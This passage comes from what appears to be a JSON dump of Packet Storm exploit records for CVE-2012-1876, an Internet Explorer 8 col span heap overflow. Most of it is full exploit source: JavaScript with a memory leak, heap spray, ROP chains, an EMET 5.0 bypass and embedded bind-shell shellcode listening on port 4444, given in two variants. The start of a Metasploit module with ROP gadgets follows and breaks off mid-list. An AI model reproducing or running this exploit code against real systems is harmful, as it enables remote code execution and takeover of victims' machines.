unescape(\"%u\"+rop25+\"%u\"+rop26); // POP ECX # RETN \nshellcode+= unescape(\"%u101C%u076d\"); // EMET string \nshellcode+= unescape(\"%ue220%u0007\"); // EMET offset \nshellcode+= unescape(\"%u\"+rop33+\"%u\"+rop34); // ADD EAX,ECX # RETN \nshellcode+= unescape(\"%u\"+rop25+\"%u\"+rop26); // POP ECX # RETN \nshellcode+= unescape(\"%u0000%u0000\"); // Zero out ECX \nshellcode+= unescape(\"%u\"+rop35+\"%u\"+rop36); // MOV DWORD PTR [EAX],ECX # RETN \nshellcode+= unescape(\"%u\"+rop37+\"%u\"+rop38); // ADD ESP,0C # RETN \nshellcode+= \"EMET\"; // EMET string \nshellcode+= unescape(\"%u0000%u0000\"); // EMET string \n// EMET disable part 0x01 end \n \n// Performing a standard Kumeh maneuver ... 
(VirtualProtect mona chain) \nshellcode+= unescape(\"%u\"+rop3+\"%u\"+rop4); // POP EBP \nshellcode+= unescape(\"%u\"+rop3+\"%u\"+rop4); // POP EBP \nshellcode+= unescape(\"%u\"+rop7+\"%u\"+rop8); // POP EBP \nshellcode+= unescape(\"%u1024%u0000\"); // Size 0x00001024 \nshellcode+= unescape(\"%u\"+rop9+\"%u\"+rop10); // POP EDX \nshellcode+= unescape(\"%u0040%u0000\"); // 0x00000040 \nshellcode+= unescape(\"%u\"+rop11+\"%u\"+rop12); // POP ECX \nshellcode+= unescape(\"%u\"+writable1+\"%u\"+writable2); // Writable Location \nshellcode+= unescape(\"%u\"+rop13+\"%u\"+rop14); // POP EDI \nshellcode+= unescape(\"%u\"+rop1+\"%u\"+rop2); // RET \nshellcode+= unescape(\"%u\"+rop15+\"%u\"+rop16); // POP ESI \nshellcode+= unescape(\"%u\"+jmpeax1+\"%u\"+jmpeax2); // JMP EAX \nshellcode+= unescape(\"%u\"+rop17+\"%u\"+rop18); // POP EAX \nshellcode+= unescape(\"%u\"+vp1+\"%u\"+vp2); // VirtualProtect() \nshellcode+= unescape(\"%u\"+rop19+\"%u\"+rop20); // MOV EAX,DWORD PTR DS:[EAX] \nshellcode+= unescape(\"%u\"+rop21+\"%u\"+rop22); // PUSHAD \nshellcode+= unescape(\"%u\"+rop23+\"%u\"+rop24); // PUSH ESP \nshellcode+= unescape(\"%u9090%u9090\"); // NOPs \n \n// EMET disable part 0x02 \n// Execute the Corbomite bluff to disarm EAF \nshellcode+= unescape(\"%uc0b8%u6d10\"); \nshellcode+= unescape(\"%u8b07%u8b00\"); \nshellcode+= unescape(\"%u6800%u10c8\"); \nshellcode+= unescape(\"%u076d%ud0ff\"); \nshellcode+= unescape(\"%ud468%u6d10\"); \nshellcode+= unescape(\"%u5007%uc4b8\"); \nshellcode+= unescape(\"%u6d10%u8b07\"); \nshellcode+= unescape(\"%u8b00%uff00\"); \nshellcode+= unescape(\"%u8bd0%u81f0\"); \nshellcode+= unescape(\"%uccec%u0002\"); \nshellcode+= unescape(\"%uc700%u2404\"); \nshellcode+= unescape(\"%u0010%u0001\"); \nshellcode+= unescape(\"%ufc8b%uccb9\"); \nshellcode+= unescape(\"%u0002%u8300\"); \nshellcode+= unescape(\"%u04c7%ue983\"); \nshellcode+= unescape(\"%u3304%uf3c0\"); \nshellcode+= unescape(\"%u54aa%ufe6a\"); \nshellcode+= unescape(\"%ud6ff%u9090\"); 
\nshellcode+= unescape(\"%u9090%u9090\"); // NOPs \nshellcode+= unescape(\"%u9090%u29eb\"); // NOPs \nshellcode+= unescape(\"%u\"+getmodulew1+\"%u\"+getmodulew2); // GetModuleHandleW \nshellcode+= unescape(\"%u\"+getprocaddr1+\"%u\"+getprocaddr2); // GetProcAddress \nshellcode+= \"NTDLL\"; \nshellcode+= unescape(\"%u0000\"); \nshellcode+= unescape(\"%u744e%u6553\"); // NtSetContextThread \nshellcode+= unescape(\"%u4374%u6e6f\"); \nshellcode+= unescape(\"%u6574%u7478\"); \nshellcode+= unescape(\"%u6854%u6572\"); \nshellcode+= unescape(\"%u6461%u0000\"); \nshellcode+= unescape(\"%u9090%u9090\"); // NOPs \nshellcode+= unescape(\"%u9090%u9090\"); // NOPs \n// EMET disable part 0x02 end \n \n// Bind shellcode on 4444 :) \n// msf > generate -t js_le \n// windows/shell_bind_tcp - 342 bytes \n// http://www.metasploit.com \n// VERBOSE=false, LPORT=4444, RHOST=, PrependMigrate=false, \n// EXITFUNC=process, InitialAutoRunScript=, AutoRunScript= \n// I would keep the shellcode the same size for better reliability :) \n \nshellcode+= unescape(\"%ue8fc%u0089%u0000%u8960%u31e5%u64d2%u528b\" + \n\"%u8b30%u0c52%u528b%u8b14%u2872%ub70f%u264a\" + \n\"%uff31%uc031%u3cac%u7c61%u2c02%uc120%u0dcf\" + \n\"%uc701%uf0e2%u5752%u528b%u8b10%u3c42%ud001\" + \n\"%u408b%u8578%u74c0%u014a%u50d0%u488b%u8b18\" + \n\"%u2058%ud301%u3ce3%u8b49%u8b34%ud601%uff31\" + \n\"%uc031%uc1ac%u0dcf%uc701%ue038%uf475%u7d03\" + \n\"%u3bf8%u247d%ue275%u8b58%u2458%ud301%u8b66\" + \n\"%u4b0c%u588b%u011c%u8bd3%u8b04%ud001%u4489\" + \n\"%u2424%u5b5b%u5961%u515a%ue0ff%u5f58%u8b5a\" + \n\"%ueb12%u5d86%u3368%u0032%u6800%u7377%u5f32\" + \n\"%u6854%u774c%u0726%ud5ff%u90b8%u0001%u2900\" + \n\"%u54c4%u6850%u8029%u006b%ud5ff%u5050%u5050\" + \n\"%u5040%u5040%uea68%udf0f%uffe0%u89d5%u31c7\" + \n\"%u53db%u0268%u1100%u895c%u6ae6%u5610%u6857\" + \n\"%udbc2%u6737%ud5ff%u5753%ub768%u38e9%uffff\" + \n\"%u53d5%u5753%u7468%u3bec%uffe1%u57d5%uc789\" + \n\"%u7568%u4d6e%uff61%u68d5%u6d63%u0064%ue389\" + 
\n\"%u5757%u3157%u6af6%u5912%ue256%u66fd%u44c7\" + \n\"%u3c24%u0101%u448d%u1024%u00c6%u5444%u5650\" + \n\"%u5656%u5646%u564e%u5356%u6856%ucc79%u863f\" + \n\"%ud5ff%ue089%u564e%uff46%u6830%u8708%u601d\" + \n\"%ud5ff%uf0bb%ua2b5%u6856%u95a6%u9dbd%ud5ff\" + \n\"%u063c%u0a7c%ufb80%u75e0%ubb05%u1347%u6f72\" + \n\"%u006a%uff53%u41d5\"); \n \n// Total spray should be 1000 \nvar padding = unescape(\"%u9090\"); \nwhile (padding.length < 1000) \npadding = padding + padding; \nvar padding = padding.substr(0, 1000 - shellcode.length); \n \nshellcode+= padding; \n \nwhile (shellcode.length < 100000) \nshellcode = shellcode + shellcode; \n \nvar onemeg = shellcode.substr(0, 64*1024/2); \n \nfor (i=0; i<14; i++) { \nonemeg += shellcode.substr(0, 64*1024/2); \n} \n \nonemeg += shellcode.substr(0, (64*1024/2)-(38/2)); \n \nvar spray = new Array(); \n \nfor (i=0; i<100; i++) { \nspray[i] = onemeg.substr(0, onemeg.length); \n} \n} \n \nfunction leak(){ \nvar leak_col = document.getElementById(\"132\"); \nleak_col.width = \"41\"; \nleak_col.span = \"19\"; \n} \n \nfunction get_leak() { \nvar str_addr = strtoint(bl[498].substring((0x100-6)/2+11,(0x100-6)/2+13)); \nstr_addr = str_addr - 1410704; \nvar hex = str_addr.toString(16); \n//alert(hex); \nsetTimeout(function(){heapspray(str_addr)}, 50); \n} \n \nfunction trigger_overflow(){ \nvar evil_col = document.getElementById(\"132\"); \nevil_col.width = \"1245880\"; \nevil_col.span = \"44\"; \n} \n \nsetTimeout(function(){leak()}, 400); \nsetTimeout(function(){get_leak()},450); \nsetTimeout(function(){trigger_overflow()}, 700); \n \n</script> \n</body> \n</html> \n \n`\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/127316/iecolspan-bypass.txt"}, {"lastseen": "2016-12-05T22:20:50", "description": "", "published": "2014-09-29T00:00:00", "type": "packetstorm", "title": "Internet Explorer 8 Fixed Col Span ID Full ASLR, DEP, 
And EMET 5.0 Bypass", "bulletinFamily": "exploit", "cvelist": ["CVE-2012-1876"], "modified": "2014-09-29T00:00:00", "id": "PACKETSTORM:128476", "href": "https://packetstormsecurity.com/files/128476/Internet-Explorer-8-Fixed-Col-Span-ID-Full-ASLR-DEP-And-EMET-5.0-Bypass.html", "sourceData": "`<!-- \n** Internet Explorer 8 Fixed Col Span ID full ASLR, DEP and EMET 5.0 bypass \n** Exploit Coded by sickness || EMET 5.0 bypass by ryujin \n** http://www.offensive-security.com/vulndev/disarming-emet-v5-0/ \u200e \n** Affected Software: Internet Explorer 8 \n** Vulnerability: Fixed Col Span ID \n** CVE: CVE-2012-1876 \n** Tested on Windows 7 (x86) - IE 8.0.7601.17514 & EMET 5.0 \n--> \n \n<html> \n<body> \n<div id=\"evil\"></div> \n<table style=\"table-layout:fixed\" ><col id=\"132\" width=\"41\" span=\"9\" > </col></table> \n<script language='javascript'> \n \nfunction strtoint(str) { \nreturn str.charCodeAt(1)*0x10000 + str.charCodeAt(0); \n} \n \nvar free = \"EEEE\"; \nwhile ( free.length < 500 ) free += free; \n \nvar string1 = \"AAAA\"; \nwhile ( string1.length < 500 ) string1 += string1; \n \nvar string2 = \"BBBB\"; \nwhile ( string2.length < 500 ) string2 += string2; \n \nvar fr = new Array(); \nvar al = new Array(); \nvar bl = new Array(); \n \nvar div_container = document.getElementById(\"evil\"); \ndiv_container.style.cssText = \"display:none\"; \n \nfor (var i=0; i < 500; i+=2) { \nfr[i] = free.substring(0, (0x100-6)/2); \nal[i] = string1.substring(0, (0x100-6)/2); \nbl[i] = string2.substring(0, (0x100-6)/2); \nvar obj = document.createElement(\"button\"); \ndiv_container.appendChild(obj); \n} \n \nfor (var i=200; i<500; i+=2 ) { \nfr[i] = null; \nCollectGarbage(); \n} \n \nfunction heapspray(cbuttonlayout) { \nCollectGarbage(); \nvar rop = cbuttonlayout + 4161; // RET \nvar rop = rop.toString(16); \nvar rop1 = rop.substring(4,8); \nvar rop2 = rop.substring(0,4); // } RET \n \nvar rop = cbuttonlayout + 11360; // POP EBP \nvar rop = rop.toString(16); \nvar rop3 = 
rop.substring(4,8); \nvar rop4 = rop.substring(0,4); // } RET \n \nvar rop = cbuttonlayout + 111675; // XCHG EAX,ESP \nvar rop = rop.toString(16); \nvar rop5 = rop.substring(4,8); \nvar rop6 = rop.substring(0,4); // } RET \n \nvar rop = cbuttonlayout + 12377; // POP EBX \nvar rop = rop.toString(16); \nvar rop7 = rop.substring(4,8); \nvar rop8 = rop.substring(0,4); // } RET \n \nvar rop = cbuttonlayout + 642768; // POP EDX \nvar rop = rop.toString(16); \nvar rop9 = rop.substring(4,8); \nvar rop10 = rop.substring(0,4); // } RET \n \nvar rop = cbuttonlayout + 12201; // POP ECX --> Changed \nvar rop = rop.toString(16); \nvar rop11 = rop.substring(4,8); \nvar rop12 = rop.substring(0,4); // } RET \n \nvar rop = cbuttonlayout + 5504544; // Writable location \nvar rop = rop.toString(16); \nvar writable1 = rop.substring(4,8); \nvar writable2 = rop.substring(0,4); // } RET \n \nvar rop = cbuttonlayout + 12462; // POP EDI \nvar rop = rop.toString(16); \nvar rop13 = rop.substring(4,8); \nvar rop14 = rop.substring(0,4); // } RET \n \nvar rop = cbuttonlayout + 12043; // POP ESI --> changed \nvar rop = rop.toString(16); \nvar rop15 = rop.substring(4,8); \nvar rop16 = rop.substring(0,4); // } RET \n \nvar rop = cbuttonlayout + 63776; // JMP EAX \nvar rop = rop.toString(16); \nvar jmpeax1 = rop.substring(4,8); \nvar jmpeax2 = rop.substring(0,4); // } RET \n \nvar rop = cbuttonlayout + 85751; // POP EAX \nvar rop = rop.toString(16); \nvar rop17 = rop.substring(4,8); \nvar rop18 = rop.substring(0,4); // } RET \n \nvar rop = cbuttonlayout + 4936; // VirtualProtect() \nvar rop = rop.toString(16); \nvar vp1 = rop.substring(4,8); \nvar vp2 = rop.substring(0,4); // } RET \n \nvar rop = cbuttonlayout + 454843; // MOV EAX,DWORD PTR DS:[EAX] \nvar rop = rop.toString(16); \nvar rop19 = rop.substring(4,8); \nvar rop20 = rop.substring(0,4); // } RET \n \nvar rop = cbuttonlayout + 234657; // PUSHAD \nvar rop = rop.toString(16); \nvar rop21 = rop.substring(4,8); \nvar rop22 = rop.substring(0,4); 
// } RET \n \n \nvar rop = cbuttonlayout + 408958; // PUSH ESP \nvar rop = rop.toString(16); \nvar rop23 = rop.substring(4,8); \nvar rop24 = rop.substring(0,4); // } RET \n \nvar rop = cbuttonlayout + 2228408; // POP ECX \nvar rop = rop.toString(16); \nvar rop25 = rop.substring(4,8); \nvar rop26 = rop.substring(0,4); // } RET \n \nvar rop = cbuttonlayout + 1586172; // POP EAX \nvar rop = rop.toString(16); \nvar rop27 = rop.substring(4,8); \nvar rop28 = rop.substring(0,4); // } RET \n \nvar rop = cbuttonlayout + 1589179; // MOV EAX,DWORD PTR [EAX] \nvar rop = rop.toString(16); \nvar rop29 = rop.substring(4,8); \nvar rop30 = rop.substring(0,4); // } RET \n \nvar rop = cbuttonlayout + 1884912; // PUSH EAX \nvar rop = rop.toString(16); \nvar rop31 = rop.substring(4,8); \nvar rop32 = rop.substring(0,4); // } RET \n \nvar rop = cbuttonlayout + 2140694; // ADD EAX,ECX \nvar rop = rop.toString(16); \nvar rop33 = rop.substring(4,8); \nvar rop34 = rop.substring(0,4); // } RET \n \nvar rop = cbuttonlayout + 2364867; // MOV DWORD PTR [EAX],ECX \nvar rop = rop.toString(16); \nvar rop35 = rop.substring(4,8); \nvar rop36 = rop.substring(0,4); // } RET \n \nvar rop = cbuttonlayout + 5036248; // ADD ESP,0C \nvar rop = rop.toString(16); \nvar rop37 = rop.substring(4,8); \nvar rop38 = rop.substring(0,4); // } RET \n \nvar rop = cbuttonlayout + 1816868; // MOV DWORD PTR DS:[ESI],EAX \nvar rop = rop.toString(16); \nvar rop39 = rop.substring(4,8); \nvar rop40 = rop.substring(0,4); // } RET \n \nvar rop = cbuttonlayout + 3660458; // MOV EDX,EAX # MOV EAX,EDX # POP ESI \nvar rop = rop.toString(16); \nvar rop41 = rop.substring(4,8); \nvar rop42 = rop.substring(0,4); // } RET \n \nvar rop = cbuttonlayout + 1560432; // PUSH EDX # CALL EAX \nvar rop = rop.toString(16); \nvar rop43 = rop.substring(4,8); \nvar rop44 = rop.substring(0,4); // } RET \n \nvar getmodulew = cbuttonlayout + 4840; // GetModuleHandleW \nvar getmodulew = getmodulew.toString(16); \nvar getmodulew1 = 
getmodulew.substring(4,8); \nvar getmodulew2 = getmodulew.substring(0,4); // } RET \n \n \nvar shellcode = unescape(\"%u4141%u4141%u4242%u4242%u4343%u4343\"); // PADDING \nshellcode+= unescape(\"%u4141%u4141%u4242%u4242%u4343%u4343\"); // PADDING \nshellcode+= unescape(\"%u4141%u4141\"); // PADDING \n \nshellcode+= unescape(\"%u\"+rop1+\"%u\"+rop2); // RETN \nshellcode+= unescape(\"%u\"+rop3+\"%u\"+rop4); // POP EBP # RETN \nshellcode+= unescape(\"%u\"+rop5+\"%u\"+rop6); // XCHG EAX,ESP # RETN \n \n// EMET disable part 0x01 \n// Implement the Tachyon detection grid to overcome the Romulan cloaking device. \nshellcode+= unescape(\"%u\"+rop27+\"%u\"+rop28); // POP EAX # RETN \nshellcode+= unescape(\"%u\"+getmodulew1+\"%u\"+getmodulew2); // GetModuleHandleW Ptr \nshellcode+= unescape(\"%u\"+rop29+\"%u\"+rop30); // MOV EAX,DWORD PTR [EAX] # RETN \nshellcode+= unescape(\"%u\"+rop31+\"%u\"+rop32); // PUSH EAX # RETN \nshellcode+= unescape(\"%u\"+rop25+\"%u\"+rop26); // POP ECX # RETN \nshellcode+= unescape(\"%u10c4%u076d\"); // EMET_STRING_PTR (GetModuleHandle argument) \nshellcode+= unescape(\"%ua84c%u000a\"); // EMET_CONFIG_STRUCT offset \nshellcode+= unescape(\"%u\"+rop15+\"%u\"+rop16); // POP ESI \nshellcode+= unescape(\"%u10c0%u076d\"); // MEM_ADDRESS_PTR (Store EMET base address here for later) \nshellcode+= unescape(\"%u\"+rop39+\"%u\"+rop40); // MOV DWORD PTR DS:[ESI],EAX \nshellcode+= unescape(\"%u\"+rop33+\"%u\"+rop34); // ADD EAX,ECX # RETN (Get the address of EMET_CONFIG_STRUCT) \nshellcode+= unescape(\"%u\"+rop19+\"%u\"+rop20); // MOV EAX,DWORD PTR DS:[EAX] \nshellcode+= unescape(\"%u\"+rop15+\"%u\"+rop16); // POP ESI \nshellcode+= unescape(\"%u104c%u076d\"); // Get fake DecodePointer argument from the stack and update it with the encoded value \nshellcode+= unescape(\"%u\"+rop39+\"%u\"+rop40); // MOV DWORD PTR DS:[ESI],EAX \nshellcode+= unescape(\"%u\"+rop27+\"%u\"+rop28); // POP EAX # RETN \nshellcode+= unescape(\"%u10c0%u076d\"); // Get EMET base address 
Ptr \nshellcode+= unescape(\"%u\"+rop19+\"%u\"+rop20); // MOV EAX,DWORD PTR DS:[EAX] \nshellcode+= unescape(\"%u\"+rop25+\"%u\"+rop26); // POP ECX # RETN \nshellcode+= unescape(\"%u80b0%u0004\"); // Get DecodePointer offset from the stack \nshellcode+= unescape(\"%u\"+rop33+\"%u\"+rop34); // ADD EAX,ECX # RETN (DecodePointer in IAT) \nshellcode+= unescape(\"%u\"+rop19+\"%u\"+rop20); // MOV EAX,DWORD PTR DS:[EAX] \nshellcode+= unescape(\"%u\"+rop31+\"%u\"+rop32); // PUSH EAX # RETN \nshellcode+= unescape(\"%u\"+rop15+\"%u\"+rop16); // POP ESI \nshellcode+= unescape(\"%u9090%u9090\"); // Fake DecodePointer argument (Will be patched) \nshellcode+= unescape(\"%u10bc%u076d\"); // MEM_ADDRESS_PTR (Store decoded pointer here here for later) \nshellcode+= unescape(\"%u\"+rop39+\"%u\"+rop40); // MOV DWORD PTR DS:[ESI],EAX \nshellcode+= unescape(\"%u\"+rop25+\"%u\"+rop26); // POP ECX # RETN \nshellcode+= unescape(\"%u0558%u0000\"); // ROP Protections offset \nshellcode+= unescape(\"%u\"+rop33+\"%u\"+rop34); // ADD EAX,ECX # RETN \nshellcode+= unescape(\"%u\"+rop25+\"%u\"+rop26); // POP ECX # RETN \nshellcode+= unescape(\"%u0000%u0000\"); // NULL \nshellcode+= unescape(\"%u\"+rop35+\"%u\"+rop36); // MOV DWORD PTR [EAX],ECX # RETN \n// EMET disable part 0x01 end \n \n// Performing a standard Kumeh maneuver ... 
(VirtualProtect mona chain) \nshellcode+= unescape(\"%u\"+rop3+\"%u\"+rop4); // POP EBP \nshellcode+= unescape(\"%u\"+rop3+\"%u\"+rop4); // POP EBP \nshellcode+= unescape(\"%u\"+rop7+\"%u\"+rop8); // POP EBP \nshellcode+= unescape(\"%u1024%u0000\"); // Size 0x00001024 \nshellcode+= unescape(\"%u\"+rop9+\"%u\"+rop10); // POP EDX \nshellcode+= unescape(\"%u0040%u0000\"); // 0x00000040 \nshellcode+= unescape(\"%u\"+rop11+\"%u\"+rop12); // POP ECX \nshellcode+= unescape(\"%u\"+writable1+\"%u\"+writable2); // Writable Location \nshellcode+= unescape(\"%u\"+rop13+\"%u\"+rop14); // POP EDI \nshellcode+= unescape(\"%u\"+rop1+\"%u\"+rop2); // RET \nshellcode+= unescape(\"%u\"+rop15+\"%u\"+rop16); // POP ESI \nshellcode+= unescape(\"%u\"+jmpeax1+\"%u\"+jmpeax2);// JMP EAX \nshellcode+= unescape(\"%u\"+rop17+\"%u\"+rop18); // POP EAX \nshellcode+= unescape(\"%u\"+vp1+\"%u\"+vp2); // VirtualProtect() \nshellcode+= unescape(\"%u\"+rop19+\"%u\"+rop20); // MOV EAX,DWORD PTR DS:[EAX] \nshellcode+= unescape(\"%u\"+rop21+\"%u\"+rop22); // PUSHAD \nshellcode+= unescape(\"%u\"+rop23+\"%u\"+rop24); // PUSH ESP \n \n// Store various pointers here \nshellcode+= unescape(\"%u9090%u9090\"); // NOPs \nshellcode+= unescape(\"%u9090%u14eb\"); // NOPs \nshellcode+= unescape(\"%u4242%u4242\"); // Decoded CONFIG structure pointer \nshellcode+= unescape(\"%u4141%u4141\"); // Store BaseAddress address on the *stack* \nshellcode+= \"EMET\"; // EMET string \nshellcode+= unescape(\"%u0000%u0000\"); // EMET string \nshellcode+= unescape(\"%u9090%u9090\"); // NOPs \nshellcode+= unescape(\"%u9090%u9090\"); // NOPs \n// Store various pointers here \n \n// EMET disable part 0x02 \n// MOV EAX,DWORD PTR DS:[076D10BCH] \n// MOV ESI,DWORD PTR [EAX+518H] \n// SUB ESP,2CCH \n// MOV DWORD PTR [ESP],10010H \n// MOV EDI,ESP \n// MOV ECX,2CCH \n// ADD EDI,4 \n// SUB ECX,4 \n// XOR EAX,EAX \n// REP STOS BYTE PTR ES:[EDI] \n// PUSH ESP \n// PUSH 0FFFFFFFEH \n// CALL ESI \nshellcode+= 
unescape(\"%ubca1%u6d10%u8b07%u18b0%u0005%u8100%uccec\" + \n\"%u0002%uc700%u2404%u0010%u0001%ufc8b%uccb9\" + \n\"%u0002%u8300%u04c7%ue983%u3304%uf3c0%u54aa\" + \n\"%ufe6a%ud6ff\"); \nshellcode+= unescape(\"%u9090%u9090\"); // NOPs \nshellcode+= unescape(\"%u9090%u9090\"); // NOPs \n// EMET disable part 0x02 end \n \n// Bind shellcode on 4444 :) \n// msf > generate -t js_le \n// windows/shell_bind_tcp - 342 bytes \n// http://www.metasploit.com \n// VERBOSE=false, LPORT=4444, RHOST=, PrependMigrate=false, \n// EXITFUNC=process, InitialAutoRunScript=, AutoRunScript= \n// I would keep the shellcode the same size for better reliability :) \n \nshellcode+= unescape(\"%ue8fc%u0089%u0000%u8960%u31e5%u64d2%u528b\" + \n\"%u8b30%u0c52%u528b%u8b14%u2872%ub70f%u264a\" + \n\"%uff31%uc031%u3cac%u7c61%u2c02%uc120%u0dcf\" + \n\"%uc701%uf0e2%u5752%u528b%u8b10%u3c42%ud001\" + \n\"%u408b%u8578%u74c0%u014a%u50d0%u488b%u8b18\" + \n\"%u2058%ud301%u3ce3%u8b49%u8b34%ud601%uff31\" + \n\"%uc031%uc1ac%u0dcf%uc701%ue038%uf475%u7d03\" + \n\"%u3bf8%u247d%ue275%u8b58%u2458%ud301%u8b66\" + \n\"%u4b0c%u588b%u011c%u8bd3%u8b04%ud001%u4489\" + \n\"%u2424%u5b5b%u5961%u515a%ue0ff%u5f58%u8b5a\" + \n\"%ueb12%u5d86%u3368%u0032%u6800%u7377%u5f32\" + \n\"%u6854%u774c%u0726%ud5ff%u90b8%u0001%u2900\" + \n\"%u54c4%u6850%u8029%u006b%ud5ff%u5050%u5050\" + \n\"%u5040%u5040%uea68%udf0f%uffe0%u89d5%u31c7\" + \n\"%u53db%u0268%u1100%u895c%u6ae6%u5610%u6857\" + \n\"%udbc2%u6737%ud5ff%u5753%ub768%u38e9%uffff\" + \n\"%u53d5%u5753%u7468%u3bec%uffe1%u57d5%uc789\" + \n\"%u7568%u4d6e%uff61%u68d5%u6d63%u0064%ue389\" + \n\"%u5757%u3157%u6af6%u5912%ue256%u66fd%u44c7\" + \n\"%u3c24%u0101%u448d%u1024%u00c6%u5444%u5650\" + \n\"%u5656%u5646%u564e%u5356%u6856%ucc79%u863f\" + \n\"%ud5ff%ue089%u564e%uff46%u6830%u8708%u601d\" + \n\"%ud5ff%uf0bb%ua2b5%u6856%u95a6%u9dbd%ud5ff\" + \n\"%u063c%u0a7c%ufb80%u75e0%ubb05%u1347%u6f72\" + \n\"%u006a%uff53%u41d5\"); \n \n// Total spray should be 1000 \nvar padding = unescape(\"%u9090\"); \nwhile 
(padding.length < 1000) \npadding = padding + padding; \nvar padding = padding.substr(0, 1000 - shellcode.length); \n \nshellcode+= padding; \n \nwhile (shellcode.length < 100000) \nshellcode = shellcode + shellcode; \n \nvar onemeg = shellcode.substr(0, 64*1024/2); \n \nfor (i=0; i<14; i++) { \nonemeg += shellcode.substr(0, 64*1024/2); \n} \n \nonemeg += shellcode.substr(0, (64*1024/2)-(38/2)); \n \nvar spray = new Array(); \n \nfor (i=0; i<100; i++) { \nspray[i] = onemeg.substr(0, onemeg.length); \n} \n} \n \nfunction leak(){ \nvar leak_col = document.getElementById(\"132\"); \nleak_col.width = \"41\"; \nleak_col.span = \"19\"; \n} \n \nfunction get_leak() { \nvar str_addr = strtoint(bl[498].substring((0x100-6)/2+11,(0x100-6)/2+13)); \nstr_addr = str_addr - 1410704; \nvar hex = str_addr.toString(16); \n//alert(hex); \nsetTimeout(function(){heapspray(str_addr)}, 50); \n} \n \nfunction trigger_overflow(){ \nvar evil_col = document.getElementById(\"132\"); \nevil_col.width = \"1245880\"; \nevil_col.span = \"44\"; \n} \n \nsetTimeout(function(){leak()}, 400); \nsetTimeout(function(){get_leak()},450); \nsetTimeout(function(){trigger_overflow()}, 700); \n \n</script> \n</body> \n</html> \n \n`\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/128476/ie8-bypass.txt"}, {"lastseen": "2016-12-05T22:16:44", "description": "", "published": "2012-08-01T00:00:00", "type": "packetstorm", "title": "Microsoft Internet Explorer Fixed Table Col Span Heap Overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2012-1876"], "modified": "2012-08-01T00:00:00", "id": "PACKETSTORM:115155", "href": "https://packetstormsecurity.com/files/115155/Microsoft-Internet-Explorer-Fixed-Table-Col-Span-Heap-Overflow.html", "sourceData": "`## \n# This file is part of the Metasploit Framework and may be subject to \n# redistribution and commercial restrictions. 
Please see the Metasploit \n# web site for more information on licensing and terms of use. \n# http://metasploit.com/ \n## \n \nrequire 'msf/core' \n \nclass Metasploit3 < Msf::Exploit::Remote \nRank = NormalRanking \n \ninclude Msf::Exploit::Remote::HttpServer::HTML \ninclude Msf::Exploit::Remote::BrowserAutopwn \nautopwn_info({ \n:os_name => OperatingSystems::WINDOWS, \n:ua_minver => \"8.0\", \n:ua_maxver => \"8.0\", \n:rank => NormalRanking, # reliable memory corruption \n:javascript => true \n}) \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'Microsoft Internet Explorer Fixed Table Col Span Heap Overflow', \n'Description' => %q{ \nThis module exploits a heap overflow vulnerability in Internet Explorer caused \nby an incorrect handling of the span attribute for col elements from a fixed table, \nwhen they are modified dynamically by javascript code. \n}, \n'License' => MSF_LICENSE, \n'Author' => \n[ \n'Alexandre Pelletier', # Vulnerability analysis \n'mr_me <steventhomasseeley[at]gmail.com>', # Metasploit module \n'binjo', # Metasploit module \n'sinn3r', # Help with the Metasploit module \n'juan' # Help with the Metasploit module \n], \n'References' => \n[ \n[ 'CVE', '2012-1876' ], \n[ 'OSVDB', '82866'], \n[ 'BID', '53848' ], \n[ 'MSB', 'MS12-037' ], \n[ 'URL', 'http://www.vupen.com/blog/20120710.Advanced_Exploitation_of_Internet_Explorer_HeapOv_CVE-2012-1876.php' ] \n], \n'DefaultOptions' => \n{ \n'EXITFUNC' => 'process', \n'InitialAutoRunScript' => 'migrate -f' \n}, \n'Payload' => \n{ \n'Space' => 1024, \n'BadChars' => \"\\x00\", \n}, \n'Platform' => 'win', \n'Targets' => \n[ \n[ 'Automatic', {} ], \n[ 'IE 8 on Windows XP SP3 with msvcrt ROP', \n{ \n'Rop' => :msvcrt \n} \n], \n[ 'IE 8 on Windows 7 SP1', \n{ \n'Rop' => :jre \n} \n] \n], \n'Privileged' => false, \n'DisclosureDate' => 'Jun 12 2012', \n'DefaultTarget' => 0)) \n \nregister_options( \n[ \nOptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation', false]) \n], self.class) 
\nend \n \ndef get_target(agent) \n#If the user is already specified by the user, we'll just use that \nreturn target if target.name != 'Automatic' \n \nif agent =~ /NT 5\\.1/ and agent =~ /MSIE 8/ \nreturn targets[1] #IE 8 on Windows XP SP3 \nelsif agent =~ /NT 6\\.1/ and agent =~ /MSIE 8/ \nreturn targets[2] #IE 8 on Windows 7 with JRE \nelse \nreturn nil \nend \nend \n \ndef junk(n=4) \nreturn rand_text_alpha(n).unpack(\"V\").first \nend \n \ndef nop \nreturn make_nops(4).unpack(\"V\").first \nend \n \ndef get_payload(t) \n \ncode = payload.encoded \n \n# Both ROP chains generated by mona.py - See corelan.be \ncase t['Rop'] \nwhen :msvcrt \nprint_status(\"Using msvcrt ROP\") \nexec_size = code.length \nrop = \n[ \n0x77c4ec01, # retn \n0x77c4ec00, # pop ebp; retn \n0x77c15ed5, # xchg eax,esp; retn (pivot) \n0x77c4e392, # pop eax; retn \n0x77c11120, # <- *&VirtualProtect() \n0x77c2e493, # mov eax, dword ptr ds:[eax]; pop ebp; retn \njunk, \n0x77c2dd6c, \n0x77c4ec00, # pop ebp; retn \n0x77c35459, # ptr to 'push esp; ret' \n0x77c47705, # pop ebx; retn \nexec_size, # ebx \n0x77c3ea01, # pop ecx; retn \n0x77c5d000, # W pointer (lpOldProtect) (-> ecx) \n0x77c46100, # pop edi; retn \n0x77c46101, # rop nop (-> edi) \n0x77c4d680, # pop edx; retn \n0x00000040, # newProtect (0x40) (-> edx) \n0x77c4e392, # pop eax; retn \nnop, # nops (-> eax) \n0x77c12df9 # pushad; retn \n].pack(\"V*\") \nwhen :jre \nprint_status(\"Using JRE ROP\") \nexec_size = code.length \nrop = \n[ \n0x7c346c0b, # retn \n0x7c36f970, # pop ebp; retn \n0x7c348b05, # xchg eax,esp; retn (pivot) \n0x7c36f970, # pop ebp; retn [MSVCR71.dll] \n0x7c36f970, # skip 